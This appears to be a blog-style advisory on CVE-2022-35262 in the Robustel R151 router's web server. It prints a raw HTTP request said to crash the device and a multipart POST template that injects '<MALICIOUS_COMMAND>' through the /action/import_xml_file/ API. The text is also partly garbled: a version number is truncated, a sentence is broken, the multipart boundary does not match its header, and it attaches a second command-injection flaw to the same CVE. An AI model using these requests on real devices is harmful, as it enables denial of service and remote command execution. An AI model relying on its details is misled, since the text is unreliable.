CVE-2022-35262 - Denial of Service Vulnerability and Command Injection in Robustel R151 Web Server HashFirst Functionality

A critical security vulnerability (CVE-2022-35262) has been identified in the web_server hashFirst functionality of Robustel R151 3.1.16 and 3.3.. This Denial of Service (DoS) vulnerability allows a malicious attacker to send a specially-crafted sequence of network requests, causing the device to crash. Additionally, the /action/import_xml_file/ API is affected by a command injection vulnerability. In this post, we will discuss the details of the exploit, provide code snippets, and share links to the original references for further information.

Vulnerability Details

The web server hashFirst functionality of the affected Robustel R151 firmware versions (3.1.16 and 3.3.) suffers from a DoS vulnerability. An attacker can exploit this vulnerability by sending a sequence of network requests to the target device, effectively causing a DoS attack. The /action/import_xml_file/ API within the web server is also susceptible to command injection vulnerability, allowing an attacker to execute unwanted commands remotely.

To exploit the DoS vulnerability, an attacker can send the following specially-crafted HTTP request

GET /hashFirst?sort=undefined&order=*&search= HTTP/1.1
Host: <TARGET_IP>
Referer: http://<TARGET_IP>/cgi/login/?key=badvalue
Connection: close

For the command injection vulnerability in the /action/import_xml_file/ API, an attacker can send the following HTTP request:

POST /action/import_xml_file/ HTTP/1.1
Host: <TARGET_IP>
Content-Type: multipart/form-data; boundary=-=-=-=48594949=-=-=-098764310988
Content-Length: <CONTENT_LENGTH>
Connection: close

---=-=-=48594949=-=-=-098764310988
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

";<MALICIOUS_COMMAND>#"---=-=-=48594949=-=-=-098764310988--

Replace <TARGET_IP> with the IP address of the target device, and <MALICIOUS_COMMAND> with the unwanted command to be executed. Note that '' should be replaced with the appropriate content length.

For more information on this vulnerability, you can refer to the following resources

1. CVE-2022-35262 vulnerability details on MITRE's website: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35262
2. Exploit details on Exploit Database, including additional information and code snippets: https://www.exploit-db.com/exploits/52529

Conclusion

The CVE-2022-35262 vulnerability present in Robustel R151's web_server hashFirst functionality poses a significant risk to affected devices. To protect your devices from these threats, it's critical to keep firmware up to date and apply the necessary security patches once available. Being aware of potential vulnerabilities and addressing them appropriately can help ensure the security and integrity of your network infrastructure.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:56:00 UTC